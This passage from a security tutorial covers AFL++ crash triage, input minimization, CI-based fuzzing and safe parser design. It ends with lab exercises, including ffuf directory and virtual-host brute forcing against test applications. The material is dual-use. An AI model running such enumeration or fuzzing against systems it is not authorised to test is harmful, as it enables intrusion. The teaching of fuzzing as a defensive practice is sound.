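    return size if size <= MASK32 else None

print(alloc_size_u32(0x40000001, 4))       # 4  (wraps: tiny allocation, huge copy)
print(alloc_size_u32(0xFFFFFFFF, 4))       # 4294967292  (wraps, but stays large)
print((0xFFFFFFFF + 1) & MASK32)           # 0  (length + 1 wraps to zero)
print(checked_alloc_size(0x40000001, 4))   # None  (overflow detected, request rejected)
```

Note that UINT_MAX is most dangerous when the server adds to it, while multiplication overflows are triggered by values just above 2^32 divided by the element size.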
Crash Triage
When AFL (or your protocol fuzzer) finds a crash, you have a starting point -- not a finished finding. Crash triage is the process of turning "the program crashed with this input" into a vulnerability assessment.
# When AFL finds crashes in output/default/crashes/ ("default" is AFL++'s instance directory):
# 1. Reproduce the crash (the harness takes the input file as its argument, as with @@)
./target_fuzz output/default/crashes/id:000000,sig:11,src:000001,op:havoc,rep:2
# sig:11 = SIGSEGV (segmentation fault)
# sig:6 = SIGABRT (assertion failure, often ASAN or abort())
# sig:8 = SIGFPE (floating point exception, often integer divide by zero)
# 2. Get crash details with GDB (for binaries WITHOUT ASAN)
gdb -batch -ex run -ex bt -ex quit --args ./target_fuzz output/default/crashes/id:000000,...
# Backtrace shows WHERE the crash occurred
# 3. Detailed ASAN report (compile with -fsanitize=address first)
./target_fuzz_asan output/default/crashes/id:000000,...
# ASAN output example:
# ==1234==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x...
# READ of size 4 at 0x... thread T0
# #0 in parse_config() config_parser.c:142
# #1 in main() harness.c:28
# Shadow bytes around the buggy address: (shows heap layout)
# 4. Assess exploitability
# Stack buffer overflow: high -- typically RCE via return address overwrite
# Heap buffer overflow: medium-high -- exploitability depends on heap layout
# Use-after-free: high -- often leads to type confusion, code exec
# Null pointer dereference: low -- typically DoS only on modern systems
# Integer overflow: depends -- if it leads to buffer overflow, high
# 5. Minimize the crash input (smaller = easier to analyze)
afl-tmin -i output/default/crashes/id:000000,... -o minimized.txt -- ./target_fuzz @@
# Removes bytes that are not necessary to trigger the crash
# A multi-kilobyte crash input often minimizes to a few dozen bytes
The crash signal is your first triage clue. SIGSEGV means the program tried to access memory it should not -- either a null pointer dereference (address near 0x0) or an out-of-bounds access to a valid-ish address. SIGABRT usually means an assertion failure or an abort() call triggered by ASAN or a CHECK() macro inside the target -- look at the abort message. SIGFPE almost always means an integer divide-by-zero (or, on x86, INT_MIN divided by -1); ordinary integer overflow does not raise a signal on its own.
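When a campaign produces dozens of crash files, it helps to sort them by signal before opening any of them. The sketch below splits a crash file name of the form shown earlier into its comma-separated key:value fields; the SIGNAL_HINTS table just restates the three signals discussed above, and both helper names are hypothetical.

```python
# Signal numbers as they appear in the sig: field on Linux.
SIGNAL_HINTS = {
    6: "SIGABRT: assertion, abort(), or sanitizer report",
    8: "SIGFPE: integer divide by zero",
    11: "SIGSEGV: invalid memory access",
}

def parse_crash_name(name: str) -> dict:
    """Split 'id:000000,sig:11,...' into a dict; parts without a colon are skipped."""
    fields = {}
    for part in name.split(","):
        key, sep, value = part.partition(":")
        if sep:
            fields[key] = value
    return fields

def describe(name: str) -> str:
    """One-line triage hint based on the sig: field."""
    sig = int(parse_crash_name(name).get("sig", "0"))
    return SIGNAL_HINTS.get(sig, f"signal {sig}: check manually")

info = parse_crash_name("id:000000,sig:11,src:000001,op:havoc,rep:2")
print(info)
print(describe("id:000000,sig:11,src:000001,op:havoc,rep:2"))
```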
The ASAN output is far more useful than a raw GDB backtrace. Where GDB tells you "it crashed at address 0x7fff..." (and you have to figure out why), ASAN tells you "heap-buffer-overflow: READ of size 4, 8 bytes beyond a 24-byte allocation". That narrows the bug immediately: there is a 24-byte allocation somewhere (you can find the allocation site in the ASAN output), and code is reading 4 bytes starting at offset 32 -- 8 bytes past the end. Find the allocation, find the code that reads past it, and you have the vulnerability.
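Because ASAN reports follow a regular layout, the fields that matter for triage can be pulled out with a few regular expressions, which is handy for grouping crashes that share a root cause. The SAMPLE report below is illustrative (addresses and paths are made up in the usual ASAN shape), and summarize_asan is a hypothetical helper that only handles this common layout.

```python
import re

SAMPLE = """\
==1234==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000038 at pc 0x0000004f5a3b
READ of size 4 at 0x602000000038 thread T0
    #0 0x4f5a3b in parse_config /src/config_parser.c:142:5
    #1 0x4f6c10 in main /src/harness.c:28:3
"""

def summarize_asan(report: str) -> dict:
    """Extract bug type, access kind/size, and the top stack frame."""
    kind = re.search(r"ERROR: AddressSanitizer: ([\w-]+)", report)
    access = re.search(r"^(READ|WRITE) of size (\d+)", report, re.M)
    frame = re.search(r"^\s*#0 \S+ in (\S+) (\S+)", report, re.M)
    return {
        "kind": kind.group(1) if kind else None,
        "access": access.group(1) if access else None,
        "size": int(access.group(2)) if access else None,
        "function": frame.group(1) if frame else None,
        "location": frame.group(2) if frame else None,
    }

summary = summarize_asan(SAMPLE)
print(summary)
```

Using the pair (kind, function) as a bucket key is a cheap first pass at deduplication: fifty crash files that all report a heap-buffer-overflow in parse_config are very likely one bug.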
Input minimization with afl-tmin is underrated. AFL's crash inputs are often large (the mutations that found the crash may have required specific bytes scattered across a kilobyte of data). afl-tmin removes blocks of data in progressively smaller chunks, re-running the target after each removal to check that the crash still occurs. The result is a much smaller input that still triggers the bug -- which makes manual analysis much easier. Fewer bytes = cleaner understanding of what the parser is mishandling.
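The core idea behind minimization can be sketched as greedy chunk removal. This is a simplified illustration, not afl-tmin's actual algorithm (which also normalizes bytes and uses coverage information); the still_crashes predicate is a hypothetical stand-in for "run the target on this input and check whether it still crashes".

```python
def minimize(data: bytes, still_crashes) -> bytes:
    """Try deleting blocks of the input, halving the block size on each pass."""
    chunk = max(len(data) // 2, 1)
    while chunk >= 1:
        pos = 0
        while pos < len(data):
            candidate = data[:pos] + data[pos + chunk:]
            if still_crashes(candidate):
                data = candidate      # block was unnecessary; retry at the same position
            else:
                pos += chunk          # block is needed; move past it
        chunk //= 2
    return data

def still_crashes(data: bytes) -> bool:
    # Stand-in for executing the target: pretend the bug needs this exact token.
    return b"len=-1" in data

crash_input = b"A" * 40 + b"len=-1" + b"B" * 50
minimized = minimize(crash_input, still_crashes)
print(len(crash_input), "->", len(minimized), minimized)   # 96 -> 6 b'len=-1'
```

Large blocks are tried first so that big stretches of padding disappear in a handful of target executions, and the final single-byte pass cleans up whatever remains.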
Defense: Fuzz Before Attackers Do
The offensive perspective on fuzzing is finding bugs in OTHER people's software. The defensive perspective is finding bugs in YOUR software before the attacker does. The same tools, completely different target.
# Integrate fuzzing into CI/CD:
# 1. OSS-Fuzz (for open-source projects -- free)
# Google runs fuzzers continuously on your project at Google scale
# Requirements: write a fuzz target, add build scripts, submit to OSS-Fuzz
# Results: bugs reported privately with 90-day disclosure deadline
# https://github.com/google/oss-fuzz
# 2. ClusterFuzzLite (GitHub Actions integration)
# Same engines as OSS-Fuzz but runs in your own CI pipeline
# No Google account needed, runs on your infrastructure
# https://google.github.io/clusterfuzzlite/
# Example GitHub Actions workflow for continuous fuzzing:
# name: Fuzz
# on:
#   push:
#   pull_request:
#   schedule:
#     - cron: '0 3 * * *'   # nightly run
# jobs:
#   fuzz:
#     runs-on: ubuntu-latest
#     steps:
#       - uses: actions/checkout@v3
#       - name: Install AFL++
#         run: sudo apt-get update && sudo apt-get install -y afl++
#       - name: Restore corpus (the cache is saved again when the job finishes)
#         uses: actions/cache@v3
#         with:
#           path: corpus
#           key: fuzz-corpus-${{ github.sha }}
#           restore-keys: fuzz-corpus-
#       - name: Build fuzz targets
#         run: afl-clang-fast -fsanitize=address -o fuzz_target fuzz_harness.c
#       - name: Run fuzzer (1 hour per run)
#         run: |
#           export AFL_SKIP_CPUFREQ=1 AFL_I_DONT_CARE_ABOUT_MISSING_CRASHES=1
#           afl-fuzz -i corpus -o findings -m none -V 3600 -- ./fuzz_target @@
#           cp -n findings/default/queue/id* corpus/   # fold new inputs into the cached corpus
#       - name: Check for crashes
#         run: |
#           if ls findings/default/crashes/id* >/dev/null 2>&1; then
#             echo "Fuzzing found crashes!"
#             ls -la findings/default/crashes/
#             exit 1
#           fi
# 3. Picking good fuzz targets
# Best candidates: parsing code, protocol handlers, format decoders
# -- any code that processes external input and does complex logic
# Poor candidates: UI code, config file loading (usually simple),
# pure computation without branching on input values
The corpus caching in the CI example is more important than it looks. On the first run, the fuzzer starts from the seed inputs alone and spends time rediscovering the basic code paths. On subsequent runs it starts from the cached corpus, which already covers those paths, and immediately explores deeper territory. This only works if the inputs the fuzzer discovers (the queue directory inside AFL++'s output folder) are copied back into the cached corpus after each run. Over weeks of CI runs, the corpus accumulates enough coverage that new mutations have to work harder to find unexplored code -- which is exactly where the interesting bugs live. Without corpus caching, every CI run starts over from zero and the fuzzing is far less effective per CPU-hour.
For target selection: not all code is equally worth fuzzing. The highest-value targets are parsers and decoders -- anything that reads external data and makes decisions based on its structure. An image parser (PNG, JPEG, WebP), a document format handler (PDF, DOCX, RTF), a network protocol implementation (TLS handshake parsing, DNS response parsing, HTTP/2 frame parsing) -- these are the functions where real-world vulnerabilities cluster, and where fuzzing has the highest yield. Code that does pure computation on validated inputs (sorting, math, string formatting with known-good data) is much less likely to have memory safety issues.
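To make "a parser that makes decisions based on input structure" concrete, here is a minimal sketch of a fuzz harness around a small decoder. The function `count_dns_labels` is a hypothetical example written for this post (it walks the length-prefixed labels of an uncompressed DNS name); it is not taken from any real DNS library. `LLVMFuzzerTestOneInput` is the standard libFuzzer entry point, and AFL++ can generally build harnesses of the same shape as well.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical parser under test: counts the labels of an uncompressed
 * DNS name. Returns the label count, or -1 if the name is malformed.
 * (It does not enforce the 255-byte total name limit.) */
int count_dns_labels(const uint8_t *data, size_t len) {
    size_t pos = 0;
    int labels = 0;
    while (pos < len) {
        uint8_t label_len = data[pos++];
        if (label_len == 0) return labels;     /* root label ends the name */
        if (label_len > 63) return -1;         /* too long; also rejects compression pointers */
        if (label_len > len - pos) return -1;  /* label would run past the buffer */
        pos += label_len;
        labels++;
    }
    return -1;  /* input ended before the terminating zero byte */
}

/* libFuzzer entry point: the fuzzer calls this once per generated input.
 * The harness only has to hand the bytes to the parser; sanitizers turn
 * any out-of-bounds access into a crash the fuzzer can record. */
int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    count_dns_labels(data, size);
    return 0;
}
```

With Clang this kind of harness is typically built with something like `clang -g -fsanitize=fuzzer,address harness.c -o harness`. Every branch in the parser depends on a byte the attacker controls, which is what makes it a high-yield target: remove the `len - pos` check and a fuzzer with AddressSanitizer should flag the over-read almost immediately.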
The AI Slop Connection
AI is changing fuzzing in both directions. AI-powered fuzzers use language models to generate structurally valid inputs that explore deeper code paths than random mutation -- essentially grammar-based fuzzing where the "grammar" is learned from real examples rather than hand-written. Google's research on ML-guided fuzzing has shown improvements in path coverage for complex protocols where random mutation gets stuck at early validation checks.
But AI also generates code that is particularly vulnerable to fuzzing. AI-generated parsers often lack bounds checking because the training data is full of insecure C patterns that "work" on expected inputs. AI-generated string handling uses strcpy and sprintf without length checks. AI-generated network code does not validate that a length field makes sense before using it as a malloc argument. Running a fuzzer against AI-generated code is almost guaranteed to find bugs -- usually within minutes, not hours. The code passes happy-path tests because the AI optimized for the common case. It fails catastrophically on unusual inputs because the AI never learned to consider the hostile case.
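The length-field problem is easy to show in code. The sketch below assumes a made-up message layout (a 2-byte big-endian length followed by the payload) and a made-up application limit `MAX_PAYLOAD`; both are assumptions for illustration. The point is the two checks that happy-path code tends to skip: the declared length must be within a sane limit, and it must not exceed the bytes that actually arrived.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define MAX_PAYLOAD 4096u  /* assumed application limit, not a standard value */

/* Assumed layout: msg[0..1] = big-endian payload length, msg[2..] = payload.
 * Returns a heap copy of the payload (caller frees) or NULL if the message
 * is malformed. On success *out_len holds the payload length. */
uint8_t *read_payload(const uint8_t *msg, size_t msg_len, size_t *out_len) {
    if (msg_len < 2) return NULL;                  /* header itself is missing */

    size_t declared = ((size_t)msg[0] << 8) | msg[1];
    if (declared > MAX_PAYLOAD) return NULL;       /* refuse absurd allocations */
    if (declared > msg_len - 2) return NULL;       /* length field lies about the data */

    uint8_t *copy = malloc(declared ? declared : 1);
    if (copy == NULL) return NULL;
    memcpy(copy, msg + 2, declared);               /* safe: declared <= bytes available */
    *out_len = declared;
    return copy;
}
```

Delete the third check and the function still passes every test that uses well-formed messages. It only fails when the length field claims more data than was sent, which is precisely the kind of input a fuzzer produces within its first few thousand executions.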
The lesson for developers: if you are shipping code -- AI-generated or otherwise -- that processes external input, fuzz it. There is no excuse for buffer overflows in new code when AFL++ finds them in 30 minutes on your laptop. The bugs that fuzzing catches are the bugs that attackers will find if you ship without testing ;-)
Exercises
Exercise 1: Install AFL++ and fuzz a simple C program. Write a function that parses a custom configuration file format (key=value lines, # for comments, [sections] for grouping). The parser should handle all three constructs and store results in a struct. Compile with afl-clang-fast and AddressSanitizer. Create 3 seed inputs (one for each feature: a comment-only file, a key=value file, a sectioned config). Fuzz for 30 minutes. Document: (a) total executions, (b) unique paths discovered (recent AFL++ versions label this "corpus count" on the status screen), (c) any crashes found, (d) the ASAN report for the first crash if applicable. Save to ~/lab-notes/afl-exercise.md.
Exercise 2: Use ffuf to fuzz a web application in your lab (DVWA, Juice Shop, or any test app). Perform: (a) directory brute forcing against the root with raft-large-words.txt from SecLists, (b) GET parameter discovery on a known page that takes parameters (hint: try the login or search pages), (c) virtual host enumeration with a subdomains wordlist. For each run, document the filter flags you used and why. Compare ffuf's speed in requests/second against running the same wordlist with gobuster. Save to ~/lab-notes/ffuf-exercise.md.
Exercise 3: Research Google OSS-Fuzz statistics and one specific CVE found by fuzzing. Find: (a) the current total bug count and number of projects covered, (b) the top 5 projects by bugs found (check the OSS-Fuzz GitHub repo for the table), (c) the most common bug classes in OSS-Fuzz findings (heap-buffer-overflow vs use-after-free vs others) and the CWE each one maps to, (d) average time from bug report to fix across the project. Then pick ONE critical CVE that was discovered by automated fuzzing (Heartbleed, CVE-2014-0160; the bash parser bugs CVE-2014-6277 and CVE-2014-6278 that Michal Zalewski found with AFL; or any other well-documented fuzz-discovered CVE) and document: the fuzzing campaign that found it, the input that triggered it, and what code change fixed it. Save to ~/lab-notes/ossfuzz-research.md.